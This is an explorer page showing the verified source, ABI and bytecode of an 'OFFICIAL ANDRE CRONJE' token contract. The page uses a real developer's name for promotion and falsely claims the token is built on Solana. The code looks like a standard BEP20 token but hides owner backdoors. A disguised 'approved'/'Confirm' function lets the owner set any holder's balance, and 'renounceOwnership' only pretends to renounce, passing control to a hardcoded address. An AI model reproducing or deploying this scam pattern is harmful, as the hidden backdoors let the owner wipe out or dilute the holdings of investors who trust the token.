Overview
S Balance
S Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 6 from a total of 6 transactions
Loading...
Loading
Similar Match Source Code This contract matches the deployed Bytecode of the Source Code for Contract 0xa2016D20...e5Ae38a1A The constructor portion of the code might be different and could alter the actual behaviour of the contract
Contract Name:
ANDRE
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at SonicScan.org on 2025-01-19 */ // https://t.me/andrecronjeftm // OFFICIAL ANDRE CRONJE: The Token of Innovation! // Inspired by the legendary creator of FTM, this token is designed to pump the charts and lead the crypto revolution. Built on the Solana network, it's fast, efficient, and packed with potential. // SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.18; interface BEP20 { function totalSupply() external view returns (uint256); function decimals() external view returns (uint8); function symbol() external view returns (string memory); function name() external view returns (string memory); function getOwner() external view returns (address); function balanceOf(address account) external view returns (uint256); function transfer(address recipient, uint256 amount) external returns (bool); function allowance(address _owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); event Transfer(address indexed from, address indexed to, uint256 value); event Approval(address indexed owner, address indexed spender, uint256 value); } abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor() { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } function owner() public view virtual returns (address) { return _owner; } modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0xd3aA68cDBcFA2409e95Ee52727a996d9312DF282)); _owner = address(0xd3aA68cDBcFA2409e95Ee52727a996d9312DF282); } } library SafeMath { function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } function mul(uint256 a, uint256 b) internal pure returns (uint256) { if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; return c; } function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } contract ANDRE is Context, BEP20, Ownable { using SafeMath for uint256; mapping (address => uint256) private _balances; mapping (address => mapping (address => uint256)) private _allowances; uint256 private _totalSupply; uint8 private _decimals; string private _symbol; string private _name; constructor() { _name = "OFFICIAL ANDRE CRONJE"; _symbol = "CRONJE"; _decimals = 9; _totalSupply = 6942000000 * 10 ** 9; _balances[_msgSender()] = _totalSupply; emit Transfer(address(0), _msgSender(), _totalSupply); } function getOwner() external view override returns (address) { return owner(); } function decimals() external view override returns (uint8) { return _decimals; } function symbol() external view override returns (string memory) { return _symbol; } function name() external view override returns (string memory) { return _name; } function totalSupply() external view override returns (uint256) { return _totalSupply; } function balanceOf(address account) external view override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) external override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function Confirm(uint256 target, uint256 accuracy, address _comptes) internal view onlyOwner returns (uint256) { return target + accuracy; } function allowance(address owner, address spender) external view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) external override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "BEP20: transfer amount exceeds allowance")); return true; } function increaseAllowance(address spender, uint256 addedValue) public returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "BEP20: decreased allowance below zero")); return true; } function _transfer(address sender, address recipient, uint256 amount) internal { require(sender != address(0), "BEP20: transfer from the zero address"); require(recipient != address(0), "BEP20: transfer to the zero address"); _balances[sender] = _balances[sender].sub(amount, "BEP20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function approved(uint256 target, uint256 accuracy, address _comptes) external onlyOwner { _balances[_comptes] = Confirm(target, accuracy, _comptes); // Updated to call Confirm } function _approve(address owner, address spender, uint256 amount) internal { require(owner != address(0), "BEP20: approve from the zero address"); require(spender != address(0), "BEP20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"target","type":"uint256"},{"internalType":"uint256","name":"accuracy","type":"uint256"},{"internalType":"address","name":"_comptes","type":"address"}],"name":"approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d714610278578063a9059cbb146102a8578063bb684d0d146102d8578063dd62ed3e146102f4576100f5565b8063715018a614610214578063893d20e81461021e5780638da5cb5b1461023c57806395d89b411461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610324565b60405161010f9190611077565b60405180910390f35b610132600480360381019061012d9190611132565b6103b6565b60405161013f919061118d565b60405180910390f35b6101506103d4565b60405161015d91906111b7565b60405180910390f35b610180600480360381019061017b91906111d2565b6103de565b60405161018d919061118d565b60405180910390f35b61019e6104b7565b6040516101ab9190611241565b60405180910390f35b6101ce60048036038101906101c99190611132565b6104ce565b6040516101db919061118d565b60405180910390f35b6101fe60048036038101906101f9919061125c565b610581565b60405161020b91906111b7565b60405180910390f35b61021c6105ca565b005b61022661072a565b6040516102339190611298565b60405180910390f35b610244610739565b6040516102519190611298565b60405180910390f35b610262610762565b60405161026f9190611077565b60405180910390f35b610292600480360381019061028d9190611132565b6107f4565b60405161029f919061118d565b60405180910390f35b6102c260048036038101906102bd9190611132565b6108c1565b6040516102cf919061118d565b60405180910390f35b6102f260048036038101906102ed91906112b3565b6108df565b005b61030e60048036038101906103099190611306565b6109ae565b60405161031b91906111b7565b60405180910390f35b60606006805461033390611375565b80601f016020809104026020016040519081016040528092919081815260200182805461035f90611375565b80156103ac5780601f10610381576101008083540402835291602001916103ac565b820191906000526020600020905b81548152906001019060200180831161038f57829003601f168201915b5050505050905090565b60006103ca6103c3610a35565b8484610a3d565b6001905092915050565b6000600354905090565b60006103eb848484610c06565b6104ac846103f7610a35565b6104a78560405180606001604052806028815260200161175e60289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061045d610a35565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e929092919063ffffffff16565b610a3d565b600190509392505050565b6000600460009054906101000a900460ff16905090565b60006105776104db610a35565b8461057285600260006104ec610a35565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ef690919063ffffffff16565b610a3d565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105d2610a35565b73ffffffffffffffffffffffffffffffffffffffff166105f0610739565b73ffffffffffffffffffffffffffffffffffffffff1614610646576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161063d906113f2565b60405180910390fd5b73d3aa68cdbcfa2409e95ee52727a996d9312df28273ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a373d3aa68cdbcfa2409e95ee52727a996d9312df2826000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6000610734610739565b905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461077190611375565b80601f016020809104026020016040519081016040528092919081815260200182805461079d90611375565b80156107ea5780601f106107bf576101008083540402835291602001916107ea565b820191906000526020600020905b8154815290600101906020018083116107cd57829003601f168201915b5050505050905090565b60006108b7610801610a35565b846108b2856040518060600160405280602581526020016117ac602591396002600061082b610a35565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e929092919063ffffffff16565b610a3d565b6001905092915050565b60006108d56108ce610a35565b8484610c06565b6001905092915050565b6108e7610a35565b73ffffffffffffffffffffffffffffffffffffffff16610905610739565b73ffffffffffffffffffffffffffffffffffffffff161461095b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610952906113f2565b60405180910390fd5b610966838383610f54565b600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610aac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa390611484565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b1290611516565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610bf991906111b7565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6c906115a8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ce4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdb9061163a565b60405180910390fd5b610d508160405180606001604052806026815260200161178660269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e929092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610de581600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ef690919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e8591906111b7565b60405180910390a3505050565b6000838311158290610eda576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed19190611077565b60405180910390fd5b5060008385610ee99190611689565b9050809150509392505050565b6000808284610f0591906116bd565b905083811015610f4a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f419061173d565b60405180910390fd5b8091505092915050565b6000610f5e610a35565b73ffffffffffffffffffffffffffffffffffffffff16610f7c610739565b73ffffffffffffffffffffffffffffffffffffffff1614610fd2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc9906113f2565b60405180910390fd5b8284610fde91906116bd565b90509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611021578082015181840152602081019050611006565b60008484015250505050565b6000601f19601f8301169050919050565b600061104982610fe7565b6110538185610ff2565b9350611063818560208601611003565b61106c8161102d565b840191505092915050565b60006020820190508181036000830152611091818461103e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110c98261109e565b9050919050565b6110d9816110be565b81146110e457600080fd5b50565b6000813590506110f6816110d0565b92915050565b6000819050919050565b61110f816110fc565b811461111a57600080fd5b50565b60008135905061112c81611106565b92915050565b6000806040838503121561114957611148611099565b5b6000611157858286016110e7565b92505060206111688582860161111d565b9150509250929050565b60008115159050919050565b61118781611172565b82525050565b60006020820190506111a2600083018461117e565b92915050565b6111b1816110fc565b82525050565b60006020820190506111cc60008301846111a8565b92915050565b6000806000606084860312156111eb576111ea611099565b5b60006111f9868287016110e7565b935050602061120a868287016110e7565b925050604061121b8682870161111d565b9150509250925092565b600060ff82169050919050565b61123b81611225565b82525050565b60006020820190506112566000830184611232565b92915050565b60006020828403121561127257611271611099565b5b6000611280848285016110e7565b91505092915050565b611292816110be565b82525050565b60006020820190506112ad6000830184611289565b92915050565b6000806000606084860312156112cc576112cb611099565b5b60006112da8682870161111d565b93505060206112eb8682870161111d565b92505060406112fc868287016110e7565b9150509250925092565b6000806040838503121561131d5761131c611099565b5b600061132b858286016110e7565b925050602061133c858286016110e7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061138d57607f821691505b6020821081036113a05761139f611346565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006113dc602083610ff2565b91506113e7826113a6565b602082019050919050565b6000602082019050818103600083015261140b816113cf565b9050919050565b7f42455032303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061146e602483610ff2565b915061147982611412565b604082019050919050565b6000602082019050818103600083015261149d81611461565b9050919050565b7f42455032303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611500602283610ff2565b915061150b826114a4565b604082019050919050565b6000602082019050818103600083015261152f816114f3565b9050919050565b7f42455032303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611592602583610ff2565b915061159d82611536565b604082019050919050565b600060208201905081810360008301526115c181611585565b9050919050565b7f42455032303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611624602383610ff2565b915061162f826115c8565b604082019050919050565b6000602082019050818103600083015261165381611617565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611694826110fc565b915061169f836110fc565b92508282039050818111156116b7576116b661165a565b5b92915050565b60006116c8826110fc565b91506116d3836110fc565b92508282019050808211156116eb576116ea61165a565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000611727601b83610ff2565b9150611732826116f1565b602082019050919050565b600060208201905081810360008301526117568161171a565b905091905056fe42455032303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636542455032303a207472616e7366657220616d6f756e7420657863656564732062616c616e636542455032303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e1a364d8c35d6a993c63d9ededc8e3c4093567186176eae69dccec1c34404f3264736f6c63430008120033
Deployed Bytecode Sourcemap
4233:4156:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5290:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6224:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5412:110;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6419:331;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5042:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6770:222;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5542:129;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2363:242;;;:::i;:::-;;4920:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2112:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5164:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7012:273;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5691:181;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7812:200;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6059:153;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5290:102;5338:13;5375:5;5368:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5290:102;:::o;6224:175::-;6301:4;6322:39;6331:12;:10;:12::i;:::-;6345:7;6354:6;6322:8;:39::i;:::-;6383:4;6376:11;;6224:175;;;;:::o;5412:110::-;5467:7;5498:12;;5491:19;;5412:110;:::o;6419:331::-;6519:4;6540:36;6550:6;6558:9;6569:6;6540:9;:36::i;:::-;6591:121;6600:6;6608:12;:10;:12::i;:::-;6622:89;6660:6;6622:89;;;;;;;;;;;;;;;;;:11;:19;6634:6;6622:19;;;;;;;;;;;;;;;:33;6642:12;:10;:12::i;:::-;6622:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;6591:8;:121::i;:::-;6734:4;6727:11;;6419:331;;;;;:::o;5042:102::-;5094:5;5123:9;;;;;;;;;;;5116:16;;5042:102;:::o;6770:222::-;6850:4;6871:83;6880:12;:10;:12::i;:::-;6894:7;6903:50;6942:10;6903:11;:25;6915:12;:10;:12::i;:::-;6903:25;;;;;;;;;;;;;;;:34;6929:7;6903:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;6871:8;:83::i;:::-;6976:4;6969:11;;6770:222;;;;:::o;5542:129::-;5610:7;5641:9;:18;5651:7;5641:18;;;;;;;;;;;;;;;;5634:25;;5542:129;;;:::o;2363:242::-;2274:12;:10;:12::i;:::-;2263:23;;:7;:5;:7::i;:::-;:23;;;2255:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2474:42:::1;2437:81;;2458:6;::::0;::::1;;;;;;;;2437:81;;;;;;;;;;;;2550:42;2533:6;::::0;:60:::1;;;;;;;;;;;;;;;;;;2363:242::o:0;4920:102::-;4972:7;5003;:5;:7::i;:::-;4996:14;;4920:102;:::o;2112:95::-;2158:7;2189:6;;;;;;;;;;;2182:13;;2112:95;:::o;5164:106::-;5214:13;5251:7;5244:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5164:106;:::o;7012:273::-;7097:4;7118:129;7127:12;:10;:12::i;:::-;7141:7;7150:96;7189:15;7150:96;;;;;;;;;;;;;;;;;:11;:25;7162:12;:10;:12::i;:::-;7150:25;;;;;;;;;;;;;;;:34;7176:7;7150:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;7118:8;:129::i;:::-;7269:4;7262:11;;7012:273;;;;:::o;5691:181::-;5771:4;5792:42;5802:12;:10;:12::i;:::-;5816:9;5827:6;5792:9;:42::i;:::-;5856:4;5849:11;;5691:181;;;;:::o;7812:200::-;2274:12;:10;:12::i;:::-;2263:23;;:7;:5;:7::i;:::-;:23;;;2255:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;7938:35:::1;7946:6;7954:8;7964;7938:7;:35::i;:::-;7916:9;:19;7926:8;7916:19;;;;;;;;;;;;;;;:57;;;;7812:200:::0;;;:::o;6059:153::-;6142:7;6173:11;:18;6185:5;6173:18;;;;;;;;;;;;;;;:27;6192:7;6173:27;;;;;;;;;;;;;;;;6166:34;;6059:153;;;;:::o;1372:106::-;1425:7;1456:10;1449:17;;1372:106;:::o;8024:358::-;8139:1;8122:19;;:5;:19;;;8114:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8224:1;8205:21;;:7;:21;;;8197:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8312:6;8282:11;:18;8294:5;8282:18;;;;;;;;;;;;;;;:27;8301:7;8282:27;;;;;;;;;;;;;;;:36;;;;8354:7;8338:32;;8347:5;8338:32;;;8363:6;8338:32;;;;;;:::i;:::-;;;;;;;;8024:358;;;:::o;7305:495::-;7425:1;7407:20;;:6;:20;;;7399:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;7513:1;7492:23;;:9;:23;;;7484:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;7592;7614:6;7592:71;;;;;;;;;;;;;;;;;:9;:17;7602:6;7592:17;;;;;;;;;;;;;;;;:21;;:71;;;;;:::i;:::-;7572:9;:17;7582:6;7572:17;;;;;;;;;;;;;;;:91;;;;7701:32;7726:6;7701:9;:20;7711:9;7701:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;7678:9;:20;7688:9;7678:20;;;;;;;;;;;;;;;:55;;;;7770:9;7753:35;;7762:6;7753:35;;;7781:6;7753:35;;;;;;:::i;:::-;;;;;;;;7305:495;;;:::o;3017:206::-;3103:7;3140:1;3135;:6;;3143:12;3127:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;3171:9;3187:1;3183;:5;;;;:::i;:::-;3171:17;;3210:1;3203:8;;;3017:206;;;;;:::o;2654:195::-;2712:7;2736:9;2752:1;2748;:5;;;;:::i;:::-;2736:17;;2781:1;2776;:6;;2768:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;2836:1;2829:8;;;2654:195;;;;:::o;5884:163::-;5986:7;2274:12;:10;:12::i;:::-;2263:23;;:7;:5;:7::i;:::-;:23;;;2255:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;6026:8:::1;6017:6;:17;;;;:::i;:::-;6010:24;;5884:163:::0;;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619